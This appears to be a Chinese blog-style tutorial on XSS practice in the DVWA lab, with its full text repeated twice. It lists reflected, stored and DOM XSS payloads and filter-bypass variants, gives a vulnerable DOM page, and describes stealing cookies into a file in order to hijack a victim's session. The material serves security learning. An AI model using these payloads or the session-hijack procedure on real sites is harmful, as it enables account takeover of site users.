web信息安全 xss漏洞

XSS(跨站脚本攻击)

 攻击者在web页面插入恶意的script代码，当用户浏览该页面，嵌入web页面中的script代码会被执行，达到攻击用户的目的。

XSS漏洞发生在web前端，主要对网站用户造成危害，不会直接危害服务器后台数据。

XSS漏洞根源：web应用程序从用户处获得输入，后不经验证，直接在web页面上输出。

代码实例第一行就是直接将代码写在了客户端，没有进行任何过滤，比如转义、html include等，此时可将”Name“替换为下面的这段JS脚本，就有可能会获取用户的cookie值，攻击者用该用户的cookie进行登录实行一系列恶意操作。

XSS攻击过程：

攻击者寻找存在XSS漏洞的web站点，攻击者将自己伪造好的链接通过邮件、qq等形式发送给受者，受害者点击该链接就会想服务器发送恶意的HTTP请求，服务端返回包含恶意数据的HTML页面给受害者，此时执行了JS脚本，返回给攻击者。

XSS类型

存储型：将恶意脚本储存在服务器端，当用户访问该服务器网站时就会执行这段代码，永久保存在后台数据库或文件中。

反射型:把用户输入的带有攻击脚本的URL反射给浏览器，客户端浏览器执行恶意脚本，攻击者需要诱导用户去点击链接。

DOM-based：修改页面的DOM节点而形成的漏洞。

查找XSS漏洞过程：

1在网站或系统中找到可输入点

2输入关键字或字符，请求服务器，查看此时的页面源代码，确认关键字或字符是否原样出现在响中

3关键字前后语法构造JS语句，并根据情况进行语法闭合

4再次提交构造哈偶的JS语句，若执行成功，则存在XSS漏洞

dvwa中低中高级别的XSS漏洞（存储型、反射型） JS语句

低：<script>alert('xss')</script>

中：<sc<script>ript>alert('xss')</script>

高：<img src=1/# onerror=alert('xss')>   #正常情况下图片源应该是个地址，现在给它替换成1或#，就会报错，根据payload,报错就会弹框

XSS payload

反射型：

1 <script>alert('xss')</script>

<script>while(true){alert("你关不掉我")}</script>

2 <scr<script>ipt>alert('xss')</script>

<scr<script>ipt>alert('xss')</script>

<s<script>cript>alert('xss')</script>

<scrip<script>t>alert('xss')</script>

<img src=# onerror=alert('hacked')>

11</pre><img src=1 onerror=alert('xss')><pre>22

<img src=1 oneronerrorror=alert('xss')>

<img src=1 oneonerror=rror=alert('hacker')>

<img src=# onmouseover=alert('hacked111')>

<img src=1 oneonerror=ONmouseover=alert('hacker99')>

<img src=# onerror=alert('hacked')>

DOM：

'onclick=alert('xss')//

'><img src=1 onerror=alert('xss')><'

------------------------------------------

存储型：

<script>alert('xss')</script>

\u003cscript\u003ealert(1)\u003cscript\u003e

<s<script>cript>alert('xss')</script>

<img src=1 onerror=alert('xss')>

通过钓鱼获取网络凭证

获取cookie、时间、referer、创建文件、打开文件、将获取的值写入文件、关闭文件

这段代码是埋在网站中的恶意脚本，IP是所埋网站的IP

dvwa实验过程：

首先将上面脚本端中的脚本埋入网站中，此时是受害者的操作：换另一个浏览器登录该网站，浏览网站内容，此时htdocs\xss中的cookie.txt文件中会获取浏览网站用户的cookie值。此时开始攻击者的操作。关闭掉埋入脚本的网站，从cookie.txt中拷贝最后的URL,用此URL发送请求，会出现网站的登录界面，现在用受害者的身份登录，因为已获取到他的cookie值。打开firebug，添加cookie将cookie.txt中的cookie，也就是受害者的cookie放在里面。然后再次用刚才在文件中拷贝的URL发送请求，就会以受害者的身份登录进网站中。

DOM型XSS漏洞

DOM:在网页上，组织页面（或文档）的对象被组织在一个树形结构中，用来表示文档中对象的标准模型就称为DOM.

可通过 JavaScript，可以操作 HTML 文档。并可以添加、删除、改变页面上的节点

要改变页面的元素，JavaScript 就需要获得对 HTML 文档中所有元素进行访问的入口

getElementById() 方法

DOM攻击：

<html>

<body>

<script>

function xsstest(){

  var str=document.getElementById("text").value;

  document.getElementById("t").innerHTML="<a href='"+str+"'>testlink</a>";

}

</script>

<div id="t"></div>

<input type="text" id="text" value="" />

<input type="button" is="s" value="write" onclick="xsstest()" />

</body>

</html>

'onclick=alert('xss')//  注释绕过

'><img src=1 onerror=alert('xss')><'   闭合绕过

添加在'str'处进行绕过从而弹框

DOM攻击演示：

http://127.0.0.1:8086/xss/dom_Dao_link.html

文本框中输入payload,点击按钮，点击生成的链接，弹框

XSS漏洞根源：web应用程序从用户处获得输入，后不经验证，直接在web页面上输出。

代码实例第一行就是直接将代码写在了客户端，没有进行任何过滤，比如转义、html include等，此时可将”Name“替换为下面的这段JS脚本，就有可能会获取用户的cookie值，攻击者用该用户的cookie进行登录实行一系列恶意操作。

XSS攻击过程：

攻击者寻找存在XSS漏洞的web站点，攻击者将自己伪造好的链接通过邮件、qq等形式发送给受者，受害者点击该链接就会想服务器发送恶意的HTTP请求，服务端返回包含恶意数据的HTML页面给受害者，此时执行了JS脚本，返回给攻击者。

XSS类型

存储型：将恶意脚本储存在服务器端，当用户访问该服务器网站时就会执行这段代码，永久保存在后台数据库或文件中。

反射型:把用户输入的带有攻击脚本的URL反射给浏览器，客户端浏览器执行恶意脚本，攻击者需要诱导用户去点击链接。

DOM-based：修改页面的DOM节点而形成的漏洞。

查找XSS漏洞过程：

1在网站或系统中找到可输入点

2输入关键字或字符，请求服务器，查看此时的页面源代码，确认关键字或字符是否原样出现在响中

3关键字前后语法构造JS语句，并根据情况进行语法闭合

4再次提交构造哈偶的JS语句，若执行成功，则存在XSS漏洞

dvwa中低中高级别的XSS漏洞（存储型、反射型） JS语句

低：<script>alert('xss')</script>

中：<sc<script>ript>alert('xss')</script>

高：<img src=1/# onerror=alert('xss')>   #正常情况下图片源应该是个地址，现在给它替换成1或#，就会报错，根据payload,报错就会弹框

XSS payload

反射型：

1 <script>alert('xss')</script>

<script>while(true){alert("你关不掉我")}</script>

2 <scr<script>ipt>alert('xss')</script>

<scr<script>ipt>alert('xss')</script>

<s<script>cript>alert('xss')</script>

<scrip<script>t>alert('xss')</script>

<img src=# onerror=alert('hacked')>

11</pre><img src=1 onerror=alert('xss')><pre>22

<img src=1 oneronerrorror=alert('xss')>

<img src=1 oneonerror=rror=alert('hacker')>

<img src=# onmouseover=alert('hacked111')>

<img src=1 oneonerror=ONmouseover=alert('hacker99')>

<img src=# onerror=alert('hacked')>

DOM：

'onclick=alert('xss')//

'><img src=1 onerror=alert('xss')><'

------------------------------------------

存储型：

<script>alert('xss')</script>

\u003cscript\u003ealert(1)\u003cscript\u003e

<s<script>cript>alert('xss')</script>

<img src=1 onerror=alert('xss')>

通过钓鱼获取网络凭证

获取cookie、时间、referer、创建文件、打开文件、将获取的值写入文件、关闭文件

这段代码是埋在网站中的恶意脚本，IP是所埋网站的IP

dvwa实验过程：

首先将上面脚本端中的脚本埋入网站中，此时是受害者的操作：换另一个浏览器登录该网站，浏览网站内容，此时htdocs\xss中的cookie.txt文件中会获取浏览网站用户的cookie值。此时开始攻击者的操作。关闭掉埋入脚本的网站，从cookie.txt中拷贝最后的URL,用此URL发送请求，会出现网站的登录界面，现在用受害者的身份登录，因为已获取到他的cookie值。打开firebug，添加cookie将cookie.txt中的cookie，也就是受害者的cookie放在里面。然后再次用刚才在文件中拷贝的URL发送请求，就会以受害者的身份登录进网站中。

DOM型XSS漏洞

DOM:在网页上，组织页面（或文档）的对象被组织在一个树形结构中，用来表示文档中对象的标准模型就称为DOM.

可通过 JavaScript，可以操作 HTML 文档。并可以添加、删除、改变页面上的节点

要改变页面的元素，JavaScript 就需要获得对 HTML 文档中所有元素进行访问的入口

getElementById() 方法

DOM攻击：

<html>

<body>

<script>

function xsstest(){

  var str=document.getElementById("text").value;

  document.getElementById("t").innerHTML="<a href='"+str+"'>testlink</a>";

}

</script>

<div id="t"></div>

<input type="text" id="text" value="" />

<input type="button" is="s" value="write" onclick="xsstest()" />

</body>

</html>

'onclick=alert('xss')//  注释绕过

'><img src=1 onerror=alert('xss')><'   闭合绕过

添加在'str'处进行绕过从而弹框

DOM攻击演示：

http://127.0.0.1:8086/xss/dom_Dao_link.html

文本框中输入payload,点击按钮，点击生成的链接，弹框